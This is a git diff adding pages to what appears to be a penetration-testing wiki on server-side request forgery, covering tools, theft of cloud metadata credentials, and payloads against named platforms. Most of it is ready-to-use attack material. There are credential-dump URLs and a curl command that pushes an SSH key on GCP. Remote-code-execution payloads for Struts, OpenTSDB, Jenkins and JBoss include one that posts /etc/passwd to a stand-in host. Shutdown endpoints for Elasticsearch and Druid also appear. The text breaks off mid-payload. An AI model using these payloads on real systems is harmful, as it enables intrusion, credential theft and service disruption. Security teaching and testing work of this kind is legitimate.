(_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the **port must always be the same**).\ +To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\ +For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference) + +### Automated DNS Rebidding + +**``**[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine. + +Check out also the publicly running server in [http://rebind.it/singularity.html](http://rebind.it/singularity.html) + +## Blind SSRF + +The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities. + +### Time based SSRF + +**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist) + +## Cloud SSRF Exploitation + +If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials: + +{% content-ref url="cloud-ssrf.md" %} +[cloud-ssrf.md](cloud-ssrf.md) +{% endcontent-ref %} + +## SSRF Vulnerable Platforms + +Several known platforms contains or has contained SSRF vulnerabilities, check them in: + +{% content-ref url="ssrf-vulnerable-platforms.md" %} +[ssrf-vulnerable-platforms.md](ssrf-vulnerable-platforms.md) +{% endcontent-ref %} + +## Tools + +### ****[**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)**** + +Tool to detect and exploit SSRF vulnerabilities + +### [Gopherus](https://github.com/tarunkant/Gopherus) + +* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/) + +This tool generates Gopher payloads for: + +* MySQL +* PostgreSQL +* FastCGI +* Redis +* Zabbix +* Memcache + +### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) + +* [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/) + +_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an _SSRF_ payload for the requested operation. Together with the `--gopher` option, ready to use _gopher_ payloads can be generated directly. + +### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy) + +SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF). + +### To practice + +{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %} + +## References + +* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md new file mode 100644 index 000000000..a47100f57 --- /dev/null +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -0,0 +1,242 @@ +# Cloud SSRF + +## AWS + +### Abusing SSRF in AWS EC2 environment + +#### 169.254.169.254 - Metadata Address + +**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)). + +The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. **AWS has no constraints**. + +Sending a GET requests to the following endpoint will **dump a list of roles** that are attached to the current EC2 instance: + +``` +http://169.254.169.254/latest/meta-data/iam/security-credentials/ +``` + +If you want to access your S3 bucket you would normally hard-code your API keys into your application. Hard-coding clear text passwords is a bad idea. This is why you can assign your EC2 instance a role which can be used to access your S3 bucket. These credentials are automatically rotated by AWS and can be access thought the metadata API. + +Once you get a list of roles attached to the EC2 instance you can **dump their credentials** by making a GET requests to the following URL: + +``` +http://169.254.169.254/latest/meta-data/iam/security-credentials/ +``` + +As an example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws) + +The response should look something like this: + +``` +{ + "Code" : "Success", + "LastUpdated" : "2019-08-03T20:42:03Z", + "Type" : "AWS-HMAC", + "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ", + "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR", + "Token" : "AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJHMEUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDXeDE+3eKIq4wMI9v//////////ARAAGgw4OTUzODQ4MTU4MzAiDEF3/SQw0vAVzHKrgCq3A84uZvhGAswagrFjgrWAvIj4cJd6eI5Gcje09FyfRPmALKJymfQgpTQN9TtC/sBhIyICfni8JJvGesQZGi9c0ZFIWqdlmM/2rdZ6GaqcZY9V+0LspbwiDK0FUjrRcquBVswSlxWs8Tr0Uhpka20mUQOBhovmVyXNzyTQUQnBE9qgFLbYY+t86yUXmXMXxGPd4sWuLgkoCF2iPlMkgUwZq8hZvoiVf7TVQU32sgstKN7ozJiJcgTBpa6/batscGBtNpck4LOvHzNwwYv/FuVkpC70bPhqNXVxMEcpwt4s7RkHHowdFlNpnPpm57dfAYwZwoklWJdvtqFQ0tZHusZ65vJqyk5cZ8f3P/Cf7UlzoZPsIsarWcgfiDvkQliU9fY6Brt7jyjrF5h7oJbW/LUS4R9SDp+qKMtUY2JmLZRovsW4GfhfLJWv7wrW81QZVC8rBKLzWFRTLRkhlTFsS7A5JscuKoORyDxGQq/pGRsE30effdS9G1xNmzKwn45/V0XsilhTE7pOJGGopuLfBo5KD46hVS9v1iBuvxrVxsHFz7mnD/GKiwi1hbFAKEvypagZ28qEJaarNvAdi2QOowjuOX6gU6tAFrfFVBb6ZTI4btIjHNNoT0TFW5iYD0dkD+csqC4nTVpnAG/FFBk+CAHdy5Gh/aBISO7OQF9xKJSXkd+Syf62pg5XiMseL3n2+2+IWdDgKwhZYxeVlMbX88QYX3P9sX+OWHWidAVgTQhZw3xJ+VBV33EKgJ4b8Bk6mgo0kiB1hnoN0KX8RXr1axpYnJv2GHb8h/det89iwpyk77+8YcEvRc+DGTLIcUIxDoirgck9bpP3EBXfs=", + "Expiration" : "2019-08-04T03:16:50Z" +} +``` + +You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do. If the role has improper permissions set (Most likely) you will be able to do all kinds of things, you might even be able to take over their entire cloud network. + +To take advantage of the new credentials, you will need to crate a new AWS profile like this one: + +``` +[profilename] +aws_access_key_id = ASIA6GG7PSQG4TCGYYOU +aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC +aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw= +``` + +Notice the **aws\_session\_token**, this is indispensable for the profile to work.\ +Information taken from: [http://ghostlulz.com/ssrf-aws-credentials/](http://ghostlulz.com/ssrf-aws-credentials/) (read that post for further information).\ +Another possible interesting place where you can find credentials is in[ http://169.254.169.254/user-data](http://169.254.169.254/user-data) + +[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges + +### SSRF in AWS ECS (Container Service) credentials + +**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**. + +If you access _**http://169.254.170.2/v2/credentials/\**_ you will find the credentials of the ECS machine. But first you need to **find the \_\**\_ . To find the \ you need to read the **environ** variable **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** inside the machine.\ +You could be able to read it exploiting an **Path Traversal** to _file:///proc/self/environ_\ +\_\_The mentioned http address should give you the **AccessKey, SecretKey and token**. + +```bash +curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O - +``` + +### SSRF URL for AWS Elastic Beanstalk + +We retrieve the `accountId` and `region` from the API. + +``` +http://169.254.169.254/latest/dynamic/instance-identity/document +http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role +``` + +We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API. + +``` +http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role +``` + +![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL) + +Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. + +## GCP + +### SSRF URL for Google Cloud + +Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True” + +``` +http://169.254.169.254/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/ +http://metadata/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/instance/hostname +http://metadata.google.internal/computeMetadata/v1/instance/id +http://metadata.google.internal/computeMetadata/v1/project/project-id +``` + +Google allows recursive pulls + +``` +http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true +``` + +Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) + +``` +http://metadata.google.internal/computeMetadata/v1beta1/ +http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true +``` + +Interesting files to pull out: + +* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json) +* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token) +* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json) + +### Add an SSH key + +Extract the token + +``` +http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json +``` + +Check the scope of the token + +``` +$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA { + "issued_to": "101302079XXXXX", + "audience": "10130207XXXXX", + "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring", + "expires_in": 2443, + "access_type": "offline" +} +``` + +Now push the SSH key. + +``` +curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata" +-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA" +-H "Content-Type: application/json" +--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' +``` + +## Digital Ocean + +Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/) + +``` +curl http://169.254.169.254/metadata/v1/id +http://169.254.169.254/metadata/v1.json +http://169.254.169.254/metadata/v1/ +http://169.254.169.254/metadata/v1/id +http://169.254.169.254/metadata/v1/user-data +http://169.254.169.254/metadata/v1/hostname +http://169.254.169.254/metadata/v1/region +http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request: +curl http://169.254.169.254/metadata/v1.json | jq +``` + +## Packetcloud + +Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata) + +## Azure + +Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/) + +[http://169.254.169.254/metadata/v1/maintenance](http://169.254.169.254/metadata/v1/maintenance) + +Update Apr 2017, Azure has more support; requires the header “Metadata: true” [`https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service) + +``` +http://169.254.169.254/metadata/instance?api-version=2017-04-02 +http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text +``` + +## OpenStack/RackSpace + +(header required? unknown) + +``` +http://169.254.169.254/openstack +``` + +## HP Helion + +(header required? unknown) + +``` +http://169.254.169.254/2009-04-04/meta-data/ +``` + +## Oracle Cloud + +``` +http://192.0.0.192/latest/ +http://192.0.0.192/latest/user-data/ +http://192.0.0.192/latest/meta-data/ +http://192.0.0.192/latest/attributes/ +``` + +## Alibaba + +``` +http://100.100.100.200/latest/meta-data/ +http://100.100.100.200/latest/meta-data/instance-id +http://100.100.100.200/latest/meta-data/image-id +``` + +## Kubernetes ETCD + +Can contain API keys and internal ip and ports + +``` +curl -L http://127.0.0.1:2379/version +curl http://127.0.0.1:2379/v2/keys/?recursive=true +``` + +## Docker + +``` +http://127.0.0.1:2375/v1.24/containers/jsonSimple example +docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash +bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json +bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json +``` + +## Rancher + +``` +curl http://rancher-metadata// +``` diff --git a/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md new file mode 100644 index 000000000..5654d0324 --- /dev/null +++ b/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md @@ -0,0 +1,643 @@ +# SSRF Vulnerable Platforms + +This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/) + +## Elasticsearch + +**Commonly bound port: 9200** + +When Elasticsearch is deployed internally, it usually does not require authentication. + +If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200: + +```http +/_cluster/health +/_cat/indices +/_cat/health +``` + +If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following path: + +Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below: + +```http +/_shutdown +/_cluster/nodes/_master/_shutdown +/_cluster/nodes/_shutdown +/_cluster/nodes/_all/_shutdown +``` + +## Weblogic + +**Commonly bound ports: 80, 443 (SSL), 7001, 8888** + +**SSRF Canary: UDDI Explorer (CVE-2014-4210)** + +```http +POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1 +Host: target.com +Content-Length: 137 +Content-Type: application/x-www-form-urlencoded + +operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search +``` + +This also works via GET: + +```bash +http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search +``` + +This endpoint is also vulnerable to CRLF injection: + +``` +GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0 +Host: vuln.weblogic +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 +Connection: close +``` + +Will result in the following request: + +``` +root@mail:~# nc -lvp 4000 +Listening on [0.0.0.0] (family 0, port 4000) +Connection from example.com 43111 received! +POST /exp HTTP/1.11 +X-CLRF: Injected HTTP/1.1 +Content-Type: text/xml; charset=UTF-8 +soapAction: "" +Content-Length: 418 +User-Agent: Java1.6.0_24 +Host: attacker.com:4000 +Accept: text/html, image/gif, image/jpeg, */*; q=.2 +Connection: Keep-Alive + +sdf +``` + +**SSRF Canary: CVE-2020-14883** + +Taken from [here](https://forum.90sec.com/t/topic/1412). + +Linux: + +```http +POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 +Host: vulnerablehost:7001 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 117 + +_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml") +``` + +Windows: + +```http +POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 +Host: vulnerablehost:7001 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 117 + +_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml") +``` + +## Hashicorp Consul + +**Commonly bound ports: 8500, 8501 (SSL)** + +Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html). + +## Shellshock + +**Commonly bound ports: 80, 443 (SSL), 8080** + +In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying: + +Short list of CGI paths to test: + +[Gist containing paths](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4). + +**SSRF Canary: Shellshock via User Agent** + +```bash +User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY +``` + +## Apache Druid + +**Commonly bound ports: 80, 8080, 8888, 8082** + +See the API reference for Apache Druid [here](https://druid.apache.org/docs/latest/operations/api-reference.html). + +If you can view the status code, check the following paths to see if they return a 200 status code: + +```bash +/status/selfDiscovered/status +/druid/coordinator/v1/leader +/druid/coordinator/v1/metadata/datasources +/druid/indexer/v1/taskStatus +``` + +Shutdown tasks, requires you to guess task IDs or the datasource name: + +```bash +/druid/indexer/v1/task/{taskId}/shutdown +/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks +``` + +Shutdown supervisors on Apache Druid Overlords: + +```bash +/druid/indexer/v1/supervisor/terminateAll +/druid/indexer/v1/supervisor/{supervisorId}/shutdown +``` + +## Apache Solr + +**Commonly bound port: 8983** + +**SSRF Canary: Shards Parameter** + +> To add to what shubham is saying - scanning for solr is relatively easy. There is a shards= param which allows you to bounce SSRF to SSRF to verify you are hitting a solr instance blindly. +> +> — Хавиж Наффи 🥕 (@nnwakelam) [January 13, 2021](https://twitter.com/nnwakelam/status/1349298311853821956?ref\_src=twsrc%5Etfw) + +Taken from [here](https://github.com/veracode-research/solr-injection). + +```bash +/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}} +/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json +/xxx?q=aaa%26shards=http://SSRF_CANARY/solr +/xxx?q=aaa&shards=http://SSRF_CANARY/solr +``` + +**SSRF Canary: Solr XXE (2017)** + +[Apache Solr 7.0.1 XXE (Packetstorm)](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html) + +```bash +/solr/gettingstarted/select?q={!xmlparser v='' +/xxx?q={!type=xmlparser v=""} +``` + +**RCE via dataImportHandler** + +[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler) + +## PeopleSoft + +**Commonly bound ports: 80,443 (SSL)** + +Taken from this research [here](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce). + +**SSRF Canary: XXE #1** + +```http +POST /PSIGW/HttpListeningConnector HTTP/1.1 +Host: website.com +Content-Type: application/xml +... + + + +]> + + &x; + + + + + + + + + + + + + + + + + + your_message_content]]> + + + + +``` + +**SSRF Canary: XXE #2** + +```http +POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 +Host: website.com +Content-Type: application/xml +... + + +``` + +## Apache Struts + +**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** + +Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/). + +**SSRF Canary: Struts2-016**: + +Append this to the end of every internal endpoint/URL you know of: + +```http +?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} +``` + +## JBoss + +**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** + +Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/). + +**SSRF Canary: Deploy WAR from URL** + +```bash +/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war +``` + +## Confluence + +**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** + +**SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older)** + +```bash +/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/ +``` + +**SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)** + +[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344) + +```bash +/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY +``` + +## Jira + +**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** + +**SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)** + +[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344) + +```bash +/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY +``` + +**SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)** + +[Atlassian Security Ticket JRASERVER-69793](https://jira.atlassian.com/browse/JRASERVER-69793) + +```bash +/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com +``` + +## Other Atlassian Products + +**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** + +**SSRF Canary: iconUriServlet (CVE-2017-9506)**: + +* Bamboo < 6.0.0 +* Bitbucket < 4.14.4 +* Crowd < 2.11.2 +* Crucible < 4.3.2 +* Fisheye < 4.3.2 + +[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344) + +```bash +/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY +``` + +## OpenTSDB + +**Commonly bound port: 4242** + +[OpenTSDB Remote Code Execution](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html) + +**SSRF Canary: curl via RCE** + +```bash +/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png +``` + +[OpenTSDB 2.4.0 Remote Code Execution](https://github.com/OpenTSDB/opentsdb/issues/2051) + +**SSRF Canary: curl via RCE - CVE-2020-35476** + +```bash +/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json +``` + +## Jenkins + +**Commonly bound ports: 80,443 (SSL),8080,8888** + +Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). + +**SSRF Canary: CVE-2018-1000600** + +```bash +/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai +``` + +**RCE** + +Follow the instructions here to achieve RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html) + +```bash +/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange; +``` + +**RCE via Groovy** + +``` +cmd = 'curl burp_collab' +pay = 'public class x {public x(){"%s".execute()}}' % cmd +data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay) +``` + +## Hystrix Dashboard + +**Commonly bound ports: 80,443 (SSL),8080** + +Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6. + +**SSRF Canary: CVE-2020-5412** + +```bash +/proxy.stream?origin=http://SSRF_CANARY/ +``` + +## W3 Total Cache + +**Commonly bound ports: 80,443 (SSL)** + +W3 Total Cache 0.9.2.6-0.9.3 + +**SSRF Canary: CVE-2019-6715** + +This needs to be a PUT request: + +```bash +PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 +Host: {{Hostname}} +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 +Content-Length: 124 +Content-Type: application/x-www-form-urlencoded +Connection: close + +{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"} +``` + +**SSRF Canary** + +The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total\_cache.html) + +This PHP code will generate a payload for your SSRF Canary host (replace `url` with your canary host): + +```php + +``` + +## Docker + +**Commonly bound ports: 2375, 2376 (SSL)** + +If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API: + +```bash +/containers/json +/secrets +/services +``` + +**RCE via running an arbitrary docker image** + +```http +POST /containers/create?name=test HTTP/1.1 +Host: website.com +Content-Type: application/json +... + +{"Image":"alpine", "Cmd":["/usr/bin/tail", 